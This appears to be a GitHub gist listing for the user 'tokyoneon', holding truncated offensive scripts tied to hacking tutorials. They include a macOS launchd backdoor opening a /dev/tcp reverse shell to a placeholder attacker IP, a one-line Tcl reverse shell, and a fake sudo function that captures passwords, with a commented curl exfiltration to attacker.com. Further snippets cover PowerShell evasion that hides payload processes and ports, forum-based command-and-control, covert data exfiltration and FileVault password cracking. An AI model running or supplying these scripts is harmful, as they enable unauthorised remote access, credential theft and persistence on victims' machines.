tokyoneon

# write-up: https://www.varonis.com/blog/author/tokyoneon/

# an if statement to prevent the attack from executing without administrator privileges
if (whoami /groups | findstr /i "S-1-16-12288")
{
	# start the attack as a background processs to prevent the PS terminal from stalling when opened
	Start-Job {
		# where to write data during the attack?
		$temp = "$env:TEMP"

tokyoneon

# write-up: https://null-byte.com/powershell-evasion-0329395/

# create the profile.ps1 directory if it doesn't exist
# cd $env:USERPROFILE;$d="Documents\WindowsPowerShell\";New-Item -ItemType Directory -Name "$d";$h=Get-Item "$d";$h.Attributes="Hidden"

# processes and filenames to exclude, pipe separated. e.g., payload.exe, evil.dll, tokyoneon.ps1
$excludeFiles = "payload|evil|tokyoneon"

# listening ports and PIDs to exclude
$excludePorts = "4444|1337|31337|55555"

tokyoneon

# writeup: https://null-byte.com/backdoor-0325535/

# create bash script executable
echo -e '#!/bin/bash\nexport PS1="backdoor> "\nbash -i >& /dev/tcp/ATTACKER-IP-ADDRESS/2222 0>&1' >/Library/Caches/persistence

# elevate file permissions
chmod +x /Library/Caches/persistence

# create launchd service
printf '<?xml version="1.0" encoding="UTF-8"?>

tokyoneon

#!/bin/bash

# https://null-byte.com/turn-forums-into-c-c-servers-0196708/

while true; do
    forumUser="tokyoneon";
    username="[email protected]";
    password="treHGFd76547^%$";
    cookies='/tmp/forum_cookies';
    function urlencode ()

tokyoneon

#!/bin/bash
# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/

# `if` statement to detemine if the message is a 'response' one
# This is the command being executed and embedded in the photo.
# Single-quotes are used here to help with escaping special
# characters within the desired command(s).
exfilData='ls -lah "/Users/$USER/"'

# Where the attackers PHP server is located. This needs to be

tokyoneon

# https://null-byte.wonderhowto.com/how-to/hacking-macos-use-one-tclsh-command-bypass-antivirus-protections-0186330/
set s [socket 1.2.3.4 9999];while 42 { puts -nonewline $s "hacker> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;

tokyoneon

#!/bin/bash

# https://null-byte.wonderhowto.com/how-to/hacking-macos-break-into-macbook-encrypted-with-filevault-0185177/

# checks to ensure all 3 args are present
if [[ ! $3 ]]; then
    echo -e "\nusage: $ ./script.sh /dev/sdaX passwords.list -killswitch\n"
    exit 0
fi

tokyoneon

function sudo () 
{ 
    # https://null-byte.com/privesc-0194190/
    realsudo="$(which sudo)";
    read -s -p "[sudo] password for $USER: " inputPasswd;
    printf "\n";
    printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt;
    # encoded=$(printf '%s' "$inputPasswd" | base64) > /dev/null 2>&1;
    # curl -s "http://attacker.com/$USER:$encoded" > /dev/null 2>&1;
    $realsudo -S -u root bash -c "exit" <<< "$inputPasswd" > /dev/null 2>&1;

tokyoneon

  `/ tokyoneon ~/backdoor-apk/backdoor-apk
    > ./backdoor-apk.sh 4.apk 
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK

tokyoneon

Keybase proof

I hereby claim:

• I am tokyoneon on github.
• I am tokyoneon (https://keybase.io/tokyoneon) on keybase.
• I have a public key whose fingerprint is 94BF C36E A65D 8973 30D6 6199 C432 53B8 CE95 B841

To claim this, I am signing this object: